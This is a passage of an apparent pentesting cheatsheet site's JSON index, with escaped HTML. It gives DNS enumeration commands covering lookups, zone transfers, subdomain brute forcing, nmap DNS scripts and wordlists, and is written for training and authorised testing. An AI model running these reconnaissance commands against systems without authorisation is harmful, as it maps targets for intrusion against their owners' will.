wordlist.txt -r \u0026lt;nameserver\u0026gt; # Sublist3r sublist3r -d \u0026lt;domain\u0026gt; # Amass amass enum -d \u0026lt;domain\u0026gt; amass enum -passive -d \u0026lt;domain\u0026gt; Nmap DNS Scripts nmap -p 53 --script dns-brute \u0026lt;domain\u0026gt; nmap -p 53 --script dns-zone-transfer \\ --script-args dns-zone-transfer.domain=\u0026lt;domain\u0026gt; \u0026lt;nameserver\u0026gt; nmap -p 53 --script dns-nsid \u0026lt;nameserver\u0026gt; nmap -p 53 --script dns-recursion \u0026lt;nameserver\u0026gt; nmap -p 53 --script dns-cache-snoop \u0026lt;nameserver\u0026gt; Reverse DNS Lookup dig -x \u0026lt;ip\u0026gt; host \u0026lt;ip\u0026gt; dnsrecon -r \u0026lt;cidr\u0026gt; -t rvl # Example dig -x 192.168.1.1 host 192.168.1.1 Wordlists (SecLists) /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt /usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt /usr/share/seclists/Discovery/DNS/dns-Jhaddix.txt ","permalink":"https://d3vilsec.com/cheatsheets/pentesting/footprinting/dns/","summary":"\u003ch1 id=\"dns-enumeration-cheatsheet\"\u003eDNS Enumeration Cheatsheet\u003c/h1\u003e\n\u003cp\u003e\u003cstrong\u003eDefault Port:\u003c/strong\u003e 53 (TCP/UDP)\u003c/p\u003e\n\u003chr\u003e\n\u003ch2 id=\"key-dns-record-types\"\u003eKey DNS Record Types\u003c/h2\u003e\n\u003ctable\u003e\n\t\u003cthead\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003cth\u003eRecord\u003c/th\u003e\n\t\t\t\t\t\u003cth\u003eDescription\u003c/th\u003e\n\t\t\t\u003c/tr\u003e\n\t\u003c/thead\u003e\n\t\u003ctbody\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003eA\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eIPv4 address\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003eAAAA\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eIPv6 address\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003eMX\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eMail server\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003eNS\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eName server\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003eTXT\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eText records (SPF, DMARC, verification)\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003eCNAME\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eCanonical name / alias\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003eSOA\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eStart of authority\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003ePTR\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eReverse lookup\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003eSRV\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eService location\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\u003c/tbody\u003e\n\u003c/table\u003e\n\u003chr\u003e\n\u003ch2 id=\"basic-lookups\"\u003eBasic Lookups\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# host\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ehost \u0026lt;domain\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ehost -t A \u0026lt;domain\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ehost -t MX \u0026lt;domain\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ehost -t NS \u0026lt;domain\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ehost -t TXT \u0026lt;domain\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ehost -t CNAME \u0026lt;domain\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# dig\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003edig \u0026lt;domain\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003edig \u0026lt;domain\u0026gt; ANY\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003edig \u0026lt;domain\u0026gt; A\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003edig \u0026lt;domain\u0026gt; MX\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003edig \u0026lt;domain\u0026gt; NS\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003edig \u0026lt;domain\u0026gt; TXT\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003edig @\u0026lt;nameserver\u0026gt; \u0026lt;domain\u0026gt; ANY +noall +answer\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# nslookup\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003enslookup \u0026lt;domain\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003enslookup -type\u003cspan style=\"color:#f92672\"\u003e=\u003c/span\u003eMX \u0026lt;domain\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003enslookup -type\u003cspan style=\"color:#f92672\"\u003e=\u003c/span\u003eNS \u0026lt;domain\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003chr\u003e\n\u003ch2 id=\"zone-transfer\"\u003eZone Transfer\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003edig axfr @\u0026lt;nameserver\u0026gt; \u0026lt;domain\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ehost -l \u0026lt;domain\u0026gt; \u0026lt;nameserver\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003efierce --domain \u0026lt;domain\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003chr\u003e\n\u003ch2 id=\"subdomain-enumeration\"\u003eSubdomain Enumeration\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# dnsenum\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ednsenum --dnsserver \u0026lt;ns\u0026gt; --enum -p \u003cspan style=\"color:#ae81ff\"\u003e0\u003c/span\u003e -s \u003cspan style=\"color:#ae81ff\"\u003e0\u003c/span\u003e -o output.txt -f wordlist.txt \u0026lt;domain\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ednsenum --enum inlanefreight.htb -f /usr/share/seclists/Discovery/DNS/subdomains-top1million-20000.txt -r\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# dnsrecon\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ednsrecon -d \u0026lt;domain\u0026gt; -t std \u003cspan style=\"color:#75715e\"\u003e# Standard enumeration\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ednsrecon -d \u0026lt;domain\u0026gt; -t axfr \u003cspan style=\"color:#75715e\"\u003e# Zone transfer attempt\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ednsrecon -d \u0026lt;domain\u0026gt; -t brt -D wordlist.txt \u003cspan style=\"color:#75715e\"\u003e# Brute force subdomains\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# gobuster DNS mode\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003egobuster dns -d \u0026lt;domain\u0026gt; -w wordlist.txt -r \u0026lt;nameserver\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Sublist3r\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003esublist3r -d \u0026lt;domain\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Amass\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eamass enum -d \u0026lt;domain\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eamass enum -passive -d \u0026lt;domain\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003chr\u003e\n\u003ch2 id=\"nmap-dns-scripts\"\u003eNmap DNS Scripts\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003enmap -p \u003cspan style=\"color:#ae81ff\"\u003e53\u003c/span\u003e --script dns-brute \u0026lt;domain\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003enmap -p \u003cspan style=\"color:#ae81ff\"\u003e53\u003c/span\u003e --script dns-zone-transfer \u003cspan style=\"color:#ae81ff\"\u003e\\\n\u003c/span\u003e\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e --script-args dns-zone-transfer.domain\u003cspan style=\"color:#f92672\"\u003e=\u003c/span\u003e\u0026lt;domain\u0026gt; \u0026lt;nameserver\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003enmap -p \u003cspan style=\"color:#ae81ff\"\u003e53\u003c/span\u003e --script dns-nsid \u0026lt;nameserver\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003enmap -p \u003cspan style=\"color:#ae81ff\"\u003e53\u003c/span\u003e --script dns-recursion \u0026lt;nameserver\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003enmap -p \u003cspan style=\"color:#ae81ff\"\u003e53\u003c/span\u003e --script dns-cache-snoop \u0026lt;nameserver\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003chr\u003e\n\u003ch2 id=\"reverse-dns-lookup\"\u003eReverse DNS Lookup\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003edig -x \u0026lt;ip\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ehost \u0026lt;ip\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ednsrecon -r \u0026lt;cidr\u0026gt; -t rvl\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Example\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003edig -x 192.168.1.1\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ehost 192.168.1.1\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003chr\u003e\n\u003ch2 id=\"wordlists-seclists\"\u003eWordlists (SecLists)\u003c/h2\u003e\n\u003cpre tabindex=\"0\"\u003e\u003ccode\u003e/usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt\n/usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt\n/usr/share/seclists/Discovery/DNS/dns-Jhaddix.txt\n\u003c/code\u003e\u003c/pre\u003e","title":"DNS"},{"content":"dnsenum Cheatsheet Type: Comprehensive DNS enumeration — dictionary \u0026amp; brute-force subdomain discovery\nInstallation sudo apt install dnsenum # or git clone https://github.com/fwaeytens/dnsenum.git Basic Usage dnsenum \u0026lt;domain\u0026gt; dnsenum example.com Common Flags Flag Description --dnsserver \u0026lt;ns\u0026gt; Use a specific DNS server -f \u0026lt;wordlist\u0026gt; Wordlist for subdomain brute force -r Enable recursive brute force on found subdomains -p \u0026lt;pages\u0026gt; Number of Google scraping pages (default: 5) -s \u0026lt;results\u0026gt; Maximum results from Google scraping -o \u0026lt;file\u0026gt; Output to XML file --enum Shortcut: enables brute force, threads, Google scraping --threads \u0026lt;n\u0026gt; Number of threads for brute forcing --noreverse Skip reverse lookup on found IP ranges --nocolor Disable colored output -v Verbose output --timeout \u0026lt;s\u0026gt; DNS query timeout in seconds Common Commands # Full enumeration with brute force dnsenum --dnsserver \u0026lt;ns\u0026gt; --enum -p 0 -s 0 -f wordlist.txt \u0026lt;domain\u0026gt; # Brute force with threads, no Google scraping dnsenum -f wordlist.txt --threads 20 --noreverse \u0026lt;domain\u0026gt; # Output to XML dnsenum -f wordlist.txt -o output.xml \u0026lt;domain\u0026gt; # Recursive brute force (enumerate found subdomains too) dnsenum -f wordlist.txt -r \u0026lt;domain\u0026gt; # Suppress Google scraping (clean/offline) dnsenum -p 0 -s 0 -f wordlist.txt \u0026lt;domain\u0026gt; # Use specific nameserver dnsenum --dnsserver 8.8.8.8 -f wordlist.txt \u0026lt;domain\u0026gt; What dnsenum Does Automatically 1. Queries A, NS, MX records 2. Attempts zone transfer (AXFR) on each nameserver 3. Google scraping for subdomains (unless -p 0 -s 0) 4. Reverse lookups on found IP ranges 5. Brute forces subdomains from wordlist (if -f provided) Recommended Wordlists /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt /usr/share/seclists/Discovery/DNS/subdomains-top1million-20000.txt /usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt /usr/share/wordlists/dnsmap.txt Example Full Run dnsenum --dnsserver 8.8.8.8 \\ --enum \\ -p 0 -s 0 \\ --threads 20 \\ -f /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt \\ -o results.xml \\ example.com ","permalink":"https://d3vilsec.com/cheatsheets/pentesting/information-gathering-web-edition/dns-and-subdomains/dnsenum/","summary":"\u003ch1 id=\"dnsenum-cheatsheet\"\u003ednsenum Cheatsheet\u003c/h1\u003e\n\u003cp\u003e\u003cstrong\u003eType:\u003c/strong\u003e Comprehensive DNS enumeration — dictionary \u0026amp; brute-force subdomain discovery\u003c/p\u003e\n\u003chr\u003e\n\u003ch2 id=\"installation\"\u003eInstallation\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003esudo apt install dnsenum\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# or\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003egit clone https://github.com/fwaeytens/dnsenum.git\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003chr\u003e\n\u003ch2 id=\"basic-usage\"\u003eBasic Usage\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ednsenum \u0026lt;domain\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ednsenum example.com\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003chr\u003e\n\u003ch2 id=\"common-flags\"\u003eCommon Flags\u003c/h2\u003e\n\u003ctable\u003e\n\t\u003cthead\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003cth\u003eFlag\u003c/th\u003e\n\t\t\t\t\t\u003cth\u003eDescription\u003c/th\u003e\n\t\t\t\u003c/tr\u003e\n\t\u003c/thead\u003e\n\t\u003ctbody\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e--dnsserver \u0026lt;ns\u0026gt;\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eUse a specific DNS server\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-f \u0026lt;wordlist\u0026gt;\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eWordlist for subdomain brute force\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-r\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eEnable recursive brute force on found subdomains\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-p \u0026lt;pages\u0026gt;\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eNumber of Google scraping pages (default: 5)\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-s \u0026lt;results\u0026gt;\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eMaximum results from Google scraping\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-o \u0026lt;file\u0026gt;\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eOutput to XML file\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e--enum\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eShortcut: enables brute force, threads, Google scraping\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e--threads \u0026lt;n\u0026gt;\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eNumber of threads for brute forcing\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e--noreverse\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eSkip reverse lookup on found IP ranges\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e--nocolor\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eDisable colored output\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-v\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eVerbose output\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e--timeout \u0026lt;s\u0026gt;\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eDNS query timeout in seconds\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\u003c/tbody\u003e\n\u003c/table\u003e\n\u003chr\u003e\n\u003ch2 id=\"common-commands\"\u003eCommon Commands\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Full enumeration with brute force\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ednsenum --dnsserver \u0026lt;ns\u0026gt; --enum -p \u003cspan style=\"color:#ae81ff\"\u003e0\u003c/span\u003e -s \u003cspan style=\"color:#ae81ff\"\u003e0\u003c/span\u003e -f wordlist.txt \u0026lt;domain\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Brute force with threads, no Google scraping\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ednsenum -f wordlist.txt --threads \u003cspan style=\"color:#ae81ff\"\u003e20\u003c/span\u003e --noreverse \u0026lt;domain\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Output to XML\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ednsenum -f wordlist.txt -o output.xml \u0026lt;domain\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Recursive brute force (enumerate found subdomains too)\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ednsenum -f wordlist.txt -r \u0026lt;domain\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Suppress Google scraping (clean/offline)\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ednsenum -p \u003cspan style=\"color:#ae81ff\"\u003e0\u003c/span\u003e -s \u003cspan style=\"color:#ae81ff\"\u003e0\u003c/span\u003e -f wordlist.txt \u0026lt;domain\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Use specific nameserver\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ednsenum --dnsserver 8.8.8.8 -f wordlist.txt \u0026lt;domain\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003chr\u003e\n\u003ch2 id=\"what-dnsenum-does-automatically\"\u003eWhat dnsenum Does Automatically\u003c/h2\u003e\n\u003cpre tabindex=\"0\"\u003e\u003ccode\u003e1. Queries A, NS, MX records\n2. Attempts zone transfer (AXFR) on each nameserver\n3. Google scraping for subdomains (unless -p 0 -s 0)\n4. Reverse lookups on found IP ranges\n5. Brute forces subdomains from wordlist (if -f provided)\n\u003c/code\u003e\u003c/pre\u003e\u003chr\u003e\n\u003ch2 id=\"recommended-wordlists\"\u003eRecommended Wordlists\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e/usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e/usr/share/seclists/Discovery/DNS/subdomains-top1million-20000.txt\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e/usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e/usr/share/wordlists/dnsmap.txt\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003chr\u003e\n\u003ch2 id=\"example-full-run\"\u003eExample Full Run\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan 